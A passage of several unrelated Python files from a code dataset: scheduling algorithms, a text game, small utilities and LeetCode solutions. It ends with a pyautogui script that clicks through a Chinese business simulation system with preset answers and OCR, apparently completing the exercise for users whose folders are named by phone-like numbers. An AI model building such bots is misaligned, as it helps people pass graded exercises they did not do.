in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n Mat[i].append(j)\r\n Mat[i][j] = 0\r\n\r\n for i in range(0, processesNumber):\r\n waitingList.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n waitingList[i].append(j)\r\n waitingList[i][j] = 0\r\n for i in range(0, processesNumber):\r\n startingList.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n startingList[i].append(j)\r\n startingList[i][j] = 0\r\n\r\n for i in range(0, processesNumber):\r\n GanttInformation.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n GanttInformation[i].append(j)\r\n GanttInformation[i][j] = 0\r\n print(\"Done number\\n\")\r\n\r\nwaitingList.clear()\r\nstartingList.clear()\r\n\r\ndef NonPrioinput(name, ArrivalTime, BurstTime, Priority):\r\n Mat[name - 1][0] = name\r\n Mat[name - 1][1] = ArrivalTime\r\n Mat[name - 1][2] = BurstTime\r\n Mat[name - 1][3] = Priority\r\n\r\n print(Mat[name - 1])\r\n\r\ncurrent_running = []\r\n\r\ndef nonpreemptive_priority(processesNumber):\r\n Mat.sort(key=operator.itemgetter(1, 3))\r\n arrival = 0 # initialize minimum arrival time\r\n priority = Mat[0][3] # initialize priority to that of first process in order\r\n currentProcess = Mat[0] # initialize process to the first process\r\n\r\n startingList = []\r\n postedlist = []\r\n count = 0\r\n index = 0\r\n # check for the same arrival time at 0\r\n for i in range(1, len(Mat)):\r\n if Mat[i][1] == 0:\r\n startingList.append(Mat[i])\r\n if len(startingList) == 0:\r\n currentRunning.append(currentProcess)\r\n Burst = Mat[0][2] # initialize burst time as a variable\r\n 
BurstCount = Mat[0][2]\r\n del Mat[0] # Remove first process from queue\r\n while len(Mat) != 0:\r\n waitingList = []\r\n for i in range(0, len(Mat)):\r\n if Mat[i][1] <= Burst:\r\n waitingList.append(Mat[i])\r\n\r\n index = i\r\n\r\n if len(waitingList) == 0:\r\n Burst = Mat[index][1]\r\n for i in range(0, len(Mat)):\r\n if Mat[i][1] <= Burst:\r\n waitingList.append(Mat[i])\r\n first = waitingList[0]\r\n for i in range(0, len(waitingList)):\r\n\r\n if waitingList[i][3] < first[3]:\r\n first = waitingList[i]\r\n elif waitingList[i][3] == first[3]:\r\n if waitingList[i][1] < first[1]:\r\n first = waitingList[i]\r\n\r\n if len(waitingList) == 1:\r\n first = waitingList[0]\r\n\r\n currentProcess = first\r\n currentRunning.append(currentProcess)\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n del Mat[i]\r\n break\r\n Burst = Burst + first[2]\r\n else:\r\n first = waitingList[0]\r\n for i in range(0, len(waitingList)):\r\n\r\n if waitingList[i][3] < first[3]:\r\n first = waitingList[i]\r\n elif waitingList[i][3] == first[3]:\r\n if waitingList[i][1] < first[1]:\r\n first = waitingList[i]\r\n if len(waitingList) == 1:\r\n first = waitingList[0]\r\n currentProcess = first\r\n currentRunning.append(currentProcess)\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n del Mat[i]\r\n break\r\n Burst = Burst + first[2]\r\n\r\n else:\r\n startingList.append(Mat[0])\r\n for i in range(0, len(startingList)):\r\n if Mat[i][3] < priority:\r\n currentProcess = Mat[i]\r\n priority = Mat[i][3]\r\n currentRunning.append(currentProcess)\r\n Burst = currentProcess[2] # initialize burst time as a variable\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == currentProcess:\r\n del Mat[i]\r\n break\r\n # Remove first process from queue\r\n while len(Mat) != 0:\r\n waitingList = []\r\n for i in range(0, len(Mat)):\r\n if Mat[i][1] <= Burst:\r\n waitingList.append(Mat[i])\r\n count = count + 1\r\n index = i\r\n if count == 0:\r\n Burst = Mat[index][1]\r\n for i in range(0, len(Mat)):\r\n if Mat[i][1] <= Burst:\r\n waitingList.append(Mat[i])\r\n first = waitingList[0]\r\n for i in range(0, len(waitingList)):\r\n\r\n if waitingList[i][3] < first[3]:\r\n first = waitingList[i]\r\n elif waitingList[i][3] == first[3]:\r\n if waitingList[i][1] < first[1]:\r\n first = waitingList[i]\r\n if len(waitingList) == 1:\r\n first = waitingList[0]\r\n\r\n currentProcess = first\r\n currentRunning.append(currentProcess)\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n del Mat[i]\r\n break\r\n Burst = Burst + first[2]\r\n else:\r\n first = waitingList[0]\r\n for i in range(0, len(waitingList)):\r\n\r\n if waitingList[i][3] < first[3]:\r\n first = waitingList[i]\r\n elif waitingList[i][3] == first[3]:\r\n if waitingList[i][1] < first[1]:\r\n first = waitingList[i]\r\n\r\n if len(waitingList) == 1:\r\n first = waitingList[0]\r\n\r\n currentProcess = first\r\n currentRunning.append(currentProcess)\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n del Mat[i]\r\n break\r\n Burst = Burst + first[2]\r\n for i in range(0, processesNumber):\r\n for j in range(0, 4):\r\n GanttInformation[i][0] = currentRunning[i][0]\r\n GanttInformation[i][1] = currentRunning[i][2]\r\n if i == 0:\r\n\r\n GanttInformation[i][2] = currentRunning[i][1]\r\n GanttInformation[i][3] = currentRunning[i][1] + currentRunning[i][2]\r\n else:\r\n if currentRunning[i][1] <= GanttInformation[i - 1][3]:\r\n GanttInformation[i][2] = GanttInformation[i - 1][3]\r\n GanttInformation[i][3] = GanttInformation[i][2] + 
GanttInformation[i][1]\r\n else:\r\n GanttInformation[i][2] = currentRunning[i][1]\r\n GanttInformation[i][3] = currentRunning[i][1] + currentRunning[i][2]\r\n PrenonCurrent = []\r\n for i in range(len(currentRunning)):\r\n PrenonCurrent.append(\"P\" + str(currentRunning[i][0]))\r\n\r\n return PrenonCurrent\r\n\r\n\r\ndef Prenonaverage(processesNumber):\r\n sum = 0\r\n for i in range(0, processesNumber):\r\n sum = sum + (GanttInformation[i][3] - currentRunning[i][1] - GanttInformation[i][1])\r\n averageWaitingTime = sum / processesNumber\r\n return averageWaitingTime\r\n\r\n\r\ndef Prenondepart(processesNumber):\r\n departure = []\r\n for i in range(processesNumber):\r\n departure.append(GanttInformation[i][3])\r\n return departure\r\n\r\ndef PrenonBurst(processesNumber):\r\n bursttime = []\r\n for i in range(processesNumber):\r\n bursttime.append(GanttInformation[i][1])\r\n return bursttime\r\n######################################### ROUND ROBIN ############################################\r\n\r\nglobal GChart\r\nGChart = []\r\nglobal RRAvgWaitingTime\r\nRRAvgWaitingTime = 0\r\nglobal RRAvgTurnAroundTime\r\nRRAvgTurnAroundTime = 0\r\nglobal RRdepart\r\nRRdepart = []\r\nPList = []\r\n\r\ndef RR_create(processesNumber):\r\n for i in range(0, processesNumber):\r\n PList.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, 3):\r\n PList[i].append(j)\r\n PList[i][j] = 0\r\n\r\n\r\n print(\"Done Number\\n\")\r\n\r\n\r\ndef RR_input(name, ArrivalTime, BurstTime):\r\n PList[name - 1][0] = name\r\n PList[name - 1][1] = ArrivalTime\r\n PList[name - 1][2] = BurstTime\r\n print(PList)\r\n\r\n\r\ndef shiftCL(alist): # circular shift left fn: to rearrange queue\r\n temp = alist[0]\r\n for i in range(len(alist)-1):\r\n alist[i] = alist[i+1]\r\n alist[len(alist)-1] = temp\r\n return alist\r\n\r\n\r\ndef RR(TQ, n): # time quantum, number of processes\r\n\r\n q = TQ # time quantum\r\n TotalBT = 0\r\n time = 0 # current time\r\n AP = 0 # arrived processes\r\n RP = 0 # ready processes\r\n DP = 0 # done processes\r\n TotalCT = 0\r\n start = 0\r\n TotalAT = 0\r\n # lists of AT and BT\r\n # waiting queue\r\n CTList = [] # completion time\r\n\r\n ATList = [] # arrival time\r\n\r\n BTList = [] # burst time\r\n queue = []\r\n a = 0\r\n\r\n while a < n:\r\n ATList.append(PList[a][1])\r\n BTList.append(PList[a][2])\r\n a += 1\r\n\r\n while(DP < n):\r\n for i in range (AP, n):\r\n if (time>= PList[i][1]):\r\n queue.append(PList[i])\r\n AP+=1\r\n RP+=1\r\n\r\n# if no process has arrived or all processes are finished\r\n if (RP < 1):\r\n GChart.append(0)\r\n time += 1\r\n continue\r\n # shift\r\n if (start): # if first quantum time is done\r\n queue = shiftCL(queue)\r\n\r\n if (queue[0][2] > 0):\r\n if (queue[0][2] > q):\r\n for g in range(time, time+q):\r\n GChart.append(queue[0][0])\r\n time += q\r\n queue[0][2] -= q\r\n\r\n else: # if process burst <= quantum\r\n for g in range(time, time+queue[0][2]):\r\n GChart.append(queue[0][0])\r\n time += queue[0][2]\r\n CTList.append(time) # add to completion time list\r\n queue[0][2] = 0\r\n DP += 1\r\n RP -= 1\r\n start = 1\r\n\r\n o = 0\r\n while o 
move on\")\n command = input(\">_\")\n '''if command.lower() in short_directions:\n pos = short_directions.index(command.lower()'''\n if [LB, JC, JB, JH, JL] in player.inventory:\n print(\"Oh wow! you actually found all the items. congrats! now go back home you've wasted enough\"\n \" time here\")\n playing = False\n if command.lower() in ['give up']:\n print(\"you give up and pass the game. not only did you give up but you cheated\"\n \" and gained nothing in return. good job degenerate\")\n playing = False\n if command.lower() in ['attack']:\n print(\" you're too much of a little wimp to actually attack my dude, this is the reason\"\n \" why karen left you, and she took the kids\")\n\n if command.lower() in ['q', 'quit', 'exit']:\n playing = False\n elif command.lower() in directions:\n try:\n room_name = getattr(player.current_location, command)\n room_object = globals()[room_name]\n\n player.move(room_object)\n except KeyError:\n print(\"this key no exist\")\n\n else:\n print(\"command not recognized\")","sub_path":"notes/world map OOPS-Tuna.py","file_name":"world map OOPS-Tuna.py","file_ext":"py","file_size_in_byte":14558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"600859556","text":"from src.controller.navbar import Navbar\nfrom src.controller.student import Student\nfrom src.controller.activity import Activity\n\n\nclass Controller:\n\n def __init__(self):\n self.view = None\n self.model = None\n\n self.navbar = None\n self.student = None\n self.activity = None\n\n def start(self, model, view):\n self.view = view\n self.model = model\n\n self.navbar = Navbar(controller=self)\n self.student = Student(controller=self)\n self.activity = Activity(controller=self)\n\n self.view.start()\n\n def raffle_button(self, defs={}):\n error, student, activity = self.model.raffle(defs=defs)\n\n if error:\n self.view.create_error_window(error=error)\n return\n\n self.view.create_raffle_window(\n student=student, activity=activity['title'])\n","sub_path":"src/controller/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"192305343","text":"#!/usr/bin/env python3\n# PYTHON_ARGCOMPLETE_OK\nfrom gcommand import Command\nimport sys\n\n\nclass PushCommand(Command):\n aliases = ['push']\n\n def run(self):\n cb = self.repo.head.shorthand\n if len(self.args) == 0:\n self.exec('git push origin %s' % (cb))\n elif len(self.args) == 1 and self.args[0] == '-f':\n self.exec('git push origin %s -f' % (cb))\n else:\n self.exec('git push %s' % (' '.join([('\"'+v+'\"' if ' ' in v else v) for v in self.args])))\n\n def getAutocompleteArgs(self, **kwargs):\n return ['-f']\n\n\nif __name__ == '__main__':\n c = PushCommand(sys.argv[1:])\n c.run()\n sys.exit(c.statuscode)","sub_path":"gpush.py","file_name":"gpush.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"520692034","text":"class Vector:\n # initializing\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return \"{}({}, {})\".format(\n self.__class__.__name__, self.x, self.y\n )\n\n\n# creating an instance of out Vector class\nvector = Vector(4, 9)\nprint(dir(Vector))\n\n# exploring __dict__ method\nprint(vector.__dict__)\nprint(vector.__dict__['x'], vector.__dict__['y'])\n\n# using __dict__ methods\nprint(getattr(vector, 'y'))\nprint(hasattr(vector, 'x'))\n","sub_path":"Python notes and examples/Code examples for advanced topics (metaclasses, abc, descriptors and etc)/test five.py","file_name":"test five.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"406843199","text":"# pylint: disable=all\n\"\"\"\n242. 有效的字母异位词\n给定两个字符串 s 和 t ,编写一个函数来判断 t 是否是 s 的字母异位词。\n\n示例 1:\n\n输入: s = \"anagram\", t = \"nagaram\"\n输出: true\n示例 2:\n\n输入: s = \"rat\", t = \"car\"\n输出: false\n说明:\n你可以假设字符串只包含小写字母。\n\n进阶:\n如果输入字符串包含 unicode 字符怎么办?你能否调整你的解法来应对这种情况?\n\"\"\"\n# 1. 暴力 sorted --> 排序后是否相等 O(nlog(n))\n# 2. hash map --> 统计每个字符出现的频次\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n return sorted(s) == sorted(t)\n\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n dict1 = {}\n for i in s:\n dict1[i] = dict1.get(i, 0) + 1\n dict2 = {}\n for i in t:\n dict2[i] = dict2.get(i, 0) + 1\n return dict1 == dict2\n\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n hash_table1, hash_table2 = [0] * 26, [0] * 26\n for i in s:\n hash_table1[ord(i) - ord(\"a\")] += 1\n for j in t:\n hash_table2[ord(j) - ord(\"a\")] += 1\n return hash_table1 == hash_table2\n","sub_path":"Week_02/242.py","file_name":"242.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"427439026","text":"import glob\nimport json\nimport os\nimport re\n\ndef make(prefix, filename):\n data = {}\n data[\"prefix\"] = prefix\n data[\"body\"] = []\n for s in open(filename):\n s = re.sub(\"\\n\", \"\", s)\n data[\"body\"].append(s)\n return data\n\nresult = {}\n\nwith open(\"./template.cpp\") as f:\n prefix = \"cpt\"\n result[prefix] = make(prefix, \"./template.cpp\")\n\nfor file in glob.glob(\"./templates/*.cpp\"):\n prefix = os.path.basename(file).split(\".\")[0]\n result[prefix] = make(prefix, file)\n\nwith open(\"./cpp.json\", \"w\") as f:\n f.write(json.dumps(result, indent=2))\n","sub_path":"vscode/make_snippet.py","file_name":"make_snippet.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"322220285","text":"class Solution(object):\n def getModifiedArray(self, length, updates):\n \"\"\"\n :type length: int\n :type updates: List[List[int]]\n :rtype: List[int]\n \"\"\"\n results = [0]*(length+1)\n for start, end, inc in updates:\n results[start] += inc\n results[end+1] -= inc\n \n for i in range(1, length+1):\n results[i] += results[i-1]\n return results[:length]","sub_path":"1010.PairsofSongsWithTotalDurationsDivisibleby60.py","file_name":"1010.PairsofSongsWithTotalDurationsDivisibleby60.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"43831195","text":"import time\nimport os\nimport shutil\nimport re\nimport winsound\nfrom Common import *\nfrom loguru import logger\nfrom write_logging import Date_Time\nfrom Init import All_Init\nimport pyautogui as png\nimport random\nimport cv2 as cv\nfrom utils.baidu_ocr import get_text_by_img\nfrom write_file_png import Image_Process\nimage_stances = Image_Process()\nos.chdir(HOME_DIR)\n\ndef make_wrapper(func):\n def wrapper(*args, **kwargs):\n args_list = list(args)\n new_args = []\n for i, item in enumerate(args_list):\n if i in [1, 3]:\n new_args.append(item+41) # +58是自动化 +50标签栏 -41firefox +17benren \n else:\n new_args.append(item)\n func(*new_args)\n return wrapper\n\n@make_wrapper\ndef save_picture(x1, y1, x2, y2, user_dir, name):\n \"\"\"\n 截图保存功能,默认保存在self.user_dir\n :param x1:\n :param y1:\n :param x2:\n :param y2:\n :param name: 图片名称\n :return:\n \"\"\"\n mouse_click(1350, 900)\n assert isinstance(name, str)\n image_stances.save_png(image_stances.shoot_png(x1, y1, x2, y2), user_dir, name)\n time.sleep(1)\n\n\n@make_wrapper\ndef mouse_click(x1, y1):\n png.moveTo(x1, y1, duration=1)\n png.click()\n time.sleep(1)\n\n\n@make_wrapper\ndef pull_mouse(x1, y1, x2, y2):\n \"\"\"拖动\"\"\"\n png.moveTo(x1, y1, duration=1)\n png.dragTo(x2, y2, duration=3)\n\n\ndef mouse_click_and_input_content(x, y, content):\n \"\"\"\n 点击输入框并输入内容\n :param x:\n :param y:\n :param content:\n :return:\n \"\"\"\n mouse_click(x, y)\n input_content(content)\n\n\ndef much_mouse_click(x1, y1, count, time_length=10):\n for i in range(count):\n time.sleep(time_length)\n mouse_click(x1, y1)\n time.sleep(10)\n\n\ndef input_content(number_str):\n \"\"\"\n 写入输入框\n :param number_str: 156.62\n :return: Null\n \"\"\"\n time.sleep(1)\n for i in number_str:\n time.sleep(0.5)\n png.press(i)\n time.sleep(2)\n\n\ndef choose_to_rent(x1, y1):\n \"\"\"\n 点击子选项+租赁选项\n :param x1:\n :param y1:\n :return:\n \"\"\"\n mouse_click(x1, y1)\n time.sleep(1)\n mouse_click(1133, 606)\n\ndef choose_to_buy(x1, y1):\n \"\"\"\n 点击子选项 + 购买选项\n :param x1:\n :param y1:\n :return:\n \"\"\"\n mouse_click(x1, y1)\n time.sleep(1)\n mouse_click(1133, 577)\n # todo:待定 mouse_click()\n\ndef resource_chose_rent():\n \"\"\"选择租赁\"\"\"\n # 生成随机值\n flag_number = random.randint(1, 3)\n # Step1:硬件资源配置\n mouse_click(720, 488)\n choose_to_rent(870, 488)\n choose_to_rent(870, 540)\n choose_to_rent(870, 590)\n choose_to_rent(870, 640)\n # Step2:软件资源配置\n mouse_click(720, 540)\n choose_to_rent(870, 488)\n choose_to_rent(870, 540)\n # Step3:网络资源配置\n mouse_click(720, 590)\n choose_to_rent(870, 488)\n choose_to_rent(870, 540)\n choose_to_rent(870, 590)\n choose_to_rent(870, 640)\n # Step4:运营资源配置\n mouse_click(720, 640)\n mouse_click(870, 490) # 4.1计算\n choose_to_rent(1020, 492)\n choose_to_rent(1020, 532)\n choose_to_rent(1020, 568)\n mouse_click(870, 520) # 4.2数据库\n choose_to_rent(1022, 492)\n choose_to_rent(1022, 531)\n choose_to_rent(1022, 570)\n choose_to_rent(1022, 610)\n mouse_click(870, 555) # 4.3存储\n choose_to_rent(1020, 490)\n choose_to_rent(1020, 530)\n choose_to_rent(1020, 570)\n mouse_click(870, 590) # 4.4域名服务\n choose_to_rent(1020, 495)\n choose_to_rent(1020, 530)\n mouse_click(870, 620) # 4.5数据分析\n choose_to_rent(1020, 495)\n choose_to_rent(1020, 530)\n choose_to_rent(1020, 570)\n choose_to_rent(1020, 610)\n choose_to_rent(1020, 650)\n mouse_click(870, 650) # 4.6安全防护\n choose_to_rent(1020, 493)\n choose_to_rent(1020, 530)\n choose_to_rent(1020, 570)\n pass\n\ndef resource_chose_buy():\n \"\"\"选择购买\"\"\"\n # 生成随机值\n flag_number = 
random.randint(1, 3)\n # Step1:硬件资源配置\n mouse_click(720, 488)\n choose_to_buy(870, 488)\n choose_to_buy(870, 540)\n choose_to_buy(870, 590)\n choose_to_buy(870, 640)\n # Step2:软件资源配置\n mouse_click(720, 540)\n choose_to_buy(870, 488)\n choose_to_buy(870, 540)\n # Step3:网络资源配置\n mouse_click(720, 590)\n choose_to_buy(870, 488)\n choose_to_buy(870, 540)\n choose_to_buy(870, 590)\n choose_to_buy(870, 640)\n # Step4:运营资源配置\n mouse_click(720, 640)\n mouse_click(870, 490) # 4.1计算\n choose_to_buy(1020, 492)\n choose_to_buy(1020, 532)\n choose_to_buy(1020, 568)\n mouse_click(870, 520) # 4.2数据库\n choose_to_buy(1022, 492)\n choose_to_buy(1022, 531)\n choose_to_buy(1022, 570)\n choose_to_buy(1022, 610)\n mouse_click(870, 555) # 4.3存储\n choose_to_buy(1020, 490)\n choose_to_buy(1020, 530)\n choose_to_buy(1020, 570)\n mouse_click(870, 590) # 4.4域名服务\n choose_to_buy(1020, 495)\n choose_to_buy(1020, 530)\n mouse_click(870, 620) # 4.5数据分析\n choose_to_buy(1020, 495)\n choose_to_buy(1020, 530)\n choose_to_buy(1020, 570)\n choose_to_buy(1020, 610)\n choose_to_buy(1020, 650)\n mouse_click(870, 650) # 4.6安全防护\n choose_to_buy(1020, 493)\n choose_to_buy(1020, 530)\n choose_to_buy(1020, 570)\n\n\ndef select_option(x1, y1, x2, y2):\n mouse_click(x1, y1)\n mouse_click(x2, y2)\n\n\ndef judge_load_status():\n\n pass\n\n\ndef basis(user_dir):\n\n # 点击开始\n mouse_click(941, 539)\n\n # 完整流程\n time.sleep(2)\n mouse_click(798, 541)\n time.sleep(20)\n\n # 开始页面截图\n save_picture(466, 272, 1420, 804, user_dir, '开始页面')\n time.sleep(5)\n mouse_click(1116, 760)\n time.sleep(90) # 加载时间较长\n\n # much_mouse_click(1116, 760, 23)\n much_mouse_click(1116, 760, 5, 5)\n time.sleep(15)\n mouse_click(1116, 760)\n time.sleep(15)\n much_mouse_click(1116, 760, 3, 10)\n much_mouse_click(1116, 760, 4, 5)\n much_mouse_click(1116, 760, 1, 10)\n much_mouse_click(1116, 760, 9, 5)\n\n\n\n# basis('C:\\\\Users\\\\jvlunl\\\\Desktop\\\\test1\\\\仿真系统\\\\resources\\\\20191106\\\\15251853026')\n\n\ndef resource_configuration_module():\n \"\"\"资源配置模块\"\"\"\n # 填写用户人数\n mouse_click_and_input_content(950, 653, '120132')\n # 点击提交\n mouse_click(1228, 684)\n # 点击下一步\n mouse_click(946, 688)\n # 点击业务预测框\n mouse_click_and_input_content(1100, 657, '147464')\n # 点击提交\n mouse_click(1240, 710)\n # 点击下一步\n mouse_click(1130, 668)\n time.sleep(2)\n # 查看资源配置图后点击确定\n mouse_click(1230, 730)\n # 点击开始配置资源\n mouse_click(1330, 643)\n # ------------开始配置资源-----------------\n # todo:选择购买或者租赁\n if '资源配置.png' in os.listdir(os.path.dirname(RESOURCES_SETTING_PNG)):\n os.rename(RESOURCES_SETTING_PNG, os.path.join(os.path.dirname(RESOURCES_SETTING_PNG), str(time.time()).replace('.', '')+'.png'))\n time.sleep(5)\n # todo:坐标待测试\n save_picture(1083, 437, 1179, 457, os.path.dirname(RESOURCES_SETTING_PNG), '资源配置')\n time.sleep(5)\n\n # 获取文字识别结果\n result_list = get_text_by_img(RESOURCES_SETTING_PNG)\n if '成长期' in result_list or '成熟期' in result_list or '持续发展期' in result_list:\n resource_chose_buy()\n else:\n resource_chose_rent()\n\n # 点击提交\n mouse_click(1200, 710)\n time.sleep(10)\n # 点击确认\n mouse_click(945, 648)\n time.sleep(10)\n # 资源配置模式选择\n select_option(1177, 465, 1113, 511)\n mouse_click_and_input_content(1156, 542, '1040')\n # 点击提交\n mouse_click(1230, 720)\n mouse_click(1180, 653)\n\n # 优化循环\n # much_mouse_click(1116, 760, 7)\n mouse_click(1116, 760)\n much_mouse_click(1116, 760, 1, 10)\n mouse_click(1116, 760)\n much_mouse_click(1116, 760, 1, 10)\n much_mouse_click(1116, 760, 3, 2)\n\n\n\n\ndef business_design_module():\n \"\"\"业务设计模块\"\"\"\n # action1:填写预计套餐费用\n 
mouse_click_and_input_content(650, 615, '95')\n pull_mouse(712, 611, 747, 607)\n pull_mouse(816, 613, 834, 613)\n mouse_click(943, 727)\n mouse_click_and_input_content(650, 615, '55')\n pull_mouse(712, 611, 729, 607)\n pull_mouse(816, 613, 834, 613)\n mouse_click(943, 727)\n mouse_click_and_input_content(650, 615, '28')\n pull_mouse(712, 611, 717, 607)\n mouse_click(943, 727)\n much_mouse_click(1116, 760, 4)\n # action2:业务流程设计\n mouse_click(935, 582)\n mouse_click(1116, 760)\n # todo: 根据字段识别顺序,拉动\n # 1. 截图保存,先重命名原截图,再截取保存\n if '产品流程.png' in os.listdir(os.path.dirname(PRODUCT_FLOW_PNG)):\n os.rename(PRODUCT_FLOW_PNG, os.path.join(os.path.dirname(PRODUCT_FLOW_PNG), str(time.time()).replace('.', '')+'.png'))\n time.sleep(5)\n save_picture(631, 375, 773, 680, os.path.dirname(PRODUCT_FLOW_PNG), '产品流程')\n time.sleep(2)\n\n # 2. 获取字段顺序,拖动\n result_list = get_text_by_img(PRODUCT_FLOW_PNG)\n from_index = [[609, 395], [615, 437], [610, 481],\n [608, 528], [615, 569], [612, 618],\n [610, 663]]\n # 选定目标用户群\n if '选定目标用户群' in result_list:\n if result_list.index('选定目标用户群') < 7:\n pull_mouse(*from_index[result_list.index('选定目标用户群')], 899, 460)\n # result_list.index('选定目标用户群')\n # 对用户群调研\n if '对用户群体进行调研' in result_list:\n if result_list.index('对用户群体进行调研') < 7:\n \n pull_mouse(*from_index[result_list.index('对用户群体进行调研')], 1020, 463)\n # result_list.index('对用户群体进行调研')\n # 设计产品实例\n if '设计产品实例' in result_list:\n if result_list.index('设计产品实例') < 7:\n pull_mouse(*from_index[result_list.index('设计产品实例')], 1146, 463)\n # result_list.index('设计产品实例')\n # 指定定价策略\n if '制定定价策略' in result_list:\n if result_list.index('制定定价策略') < 7:\n pull_mouse(*from_index[result_list.index('制定定价策略')], 1270, 463)\n # result_list.index('制定定价策略')\n # 产品测试\n if '产品测试' in result_list:\n if result_list.index('产品测试') < 7:\n pull_mouse(*from_index[result_list.index('产品测试')], 897, 595)\n # result_list.index('产品测试')\n # 产品优化\n if '产品优化' in result_list:\n if result_list.index('产品优化') < 7:\n pull_mouse(*from_index[result_list.index('产品优化')], 1023, 595)\n # result_list.index('产品优化')\n # 产品推广\n if '产品推广' in result_list:\n if result_list.index('产品推广') < 7:\n \n pull_mouse(*from_index[result_list.index('产品推广')], 1150, 595)\n # result_list.index('产品推广')\n mouse_click(1268, 674)\n mouse_click(1037, 614)\n mouse_click(1116, 760)\n # todo: 选择字段,判断字段是否是随机的,是随机分布\n mouse_click(1272, 673)\n mouse_click(1270, 647)\n if random.randint(1, 2) == 2: # 错误选择\n mouse_click(1275, 617)\n else:\n mouse_click(1270, 589) # 第三个无效字段\n # 点击确认\n mouse_click(1325, 746)\n time.sleep(2)\n much_mouse_click(1116, 760, 5, 2)\n mouse_click(953, 572)\n much_mouse_click(1116, 760, 2, 2)\n time.sleep(10)\n # action3:字段分析\n # todo:数据面板展示流程需要debug\n # 点击新业务费\n mouse_click(737, 436)\n mouse_click(574, 549)\n mouse_click(641, 324)\n mouse_click(1345, 778)\n much_mouse_click(1116, 760, 4, 3)\n mouse_click(1264, 790)\n # mouse_click_and_input_content(1025, 787, '250004443241')\n # 业务号是随机的,需要模拟点击\n time.sleep(5)\n mouse_click(640, 468)\n # 提交\n mouse_click(1370, 790)\n time.sleep(2)\n\n much_mouse_click(1116, 760, 8, 3)\n # 开始业务设计\n mouse_click(946, 550)\n mouse_click(952, 634)\n much_mouse_click(1116, 760, 2)\n mouse_click(945, 561)\n much_mouse_click(1116, 760, 6)\n # 流失分析\n mouse_click_and_input_content(1189, 466, '64')\n mouse_click_and_input_content(1189, 513, '14')\n mouse_click_and_input_content(1189, 560, '27')\n mouse_click_and_input_content(1189, 611, '56')\n mouse_click(1196, 671)\n pull_mouse(713, 747, 548, 746)\n mouse_click(592, 735)\n mouse_click(708, 727)\n mouse_click(823, 
730)\n mouse_click(938, 730)\n mouse_click(1050, 729)\n # 点击生成\n mouse_click(1232, 740)\n mouse_click(1312, 739)\n # action4:设计挽留业务\n mouse_click_and_input_content(826, 506, '9')\n mouse_click_and_input_content(970, 506, '9')\n mouse_click_and_input_content(1150, 506, '9')\n mouse_click_and_input_content(824, 557, '9')\n mouse_click_and_input_content(966, 557, '9')\n mouse_click_and_input_content(1153, 557, '9')\n mouse_click_and_input_content(827, 608, '9')\n mouse_click_and_input_content(968, 608, '9')\n mouse_click_and_input_content(1148, 608, '9')\n mouse_click(943, 659)\n much_mouse_click(1116, 760, 5)\n time.sleep(20)\n much_mouse_click(1116, 760, 3)\n time.sleep(10)\n much_mouse_click(1116, 760, 2)\n\n\ndef marketing_module():\n \"\"\"市场推广模块\"\"\"\n mouse_click_and_input_content(1307, 611, '0.1')\n mouse_click_and_input_content(1306, 650, '1590.16')\n mouse_click_and_input_content(1299, 684, '1027.38')\n mouse_click_and_input_content(1307, 715, '1391.58')\n mouse_click(1298, 758)\n time.sleep(10)\n mouse_click(1170, 662)\n time.sleep(10)\n mouse_click(1116, 760)\n time.sleep(10)\n # 业务定价\n # 先设定条件\n mouse_click(617, 489)\n time.sleep(1)\n mouse_click(599, 545)\n time.sleep(1)\n mouse_click(569, 606)\n time.sleep(1)\n mouse_click(639, 666)\n time.sleep(2)\n mouse_click_and_input_content(1104, 515, '0.24')\n mouse_click_and_input_content(1271, 516, '0.6')\n mouse_click_and_input_content(1104, 553, '0.22')\n mouse_click_and_input_content(1277, 554, '0.55')\n mouse_click_and_input_content(1104, 593, '0.3')\n mouse_click_and_input_content(1269, 594, '0.75')\n mouse_click(1110, 664)\n time.sleep(5)\n mouse_click(944, 725)\n mouse_click(1116, 760)\n time.sleep(5)\n # 产品推广方式\n mouse_click_and_input_content(1026, 494, '5')\n mouse_click_and_input_content(1028, 553, '5')\n mouse_click(946, 599)\n time.sleep(5)\n mouse_click(1116, 760)\n # 产品收益表\n mouse_click_and_input_content(768, 629, '489683')\n mouse_click_and_input_content(861, 626, '367119')\n mouse_click_and_input_content(958, 628, '244755')\n mouse_click_and_input_content(769, 655, '167315.4')\n mouse_click_and_input_content(865, 655, '111558.6')\n mouse_click_and_input_content(955, 657, '55801.8')\n mouse_click_and_input_content(772, 683, '23760')\n mouse_click_and_input_content(863, 684, '15840')\n mouse_click_and_input_content(946, 686, '7920')\n mouse_click(1217, 685)\n time.sleep(5)\n much_mouse_click(1116, 760, 2, 2)\n # 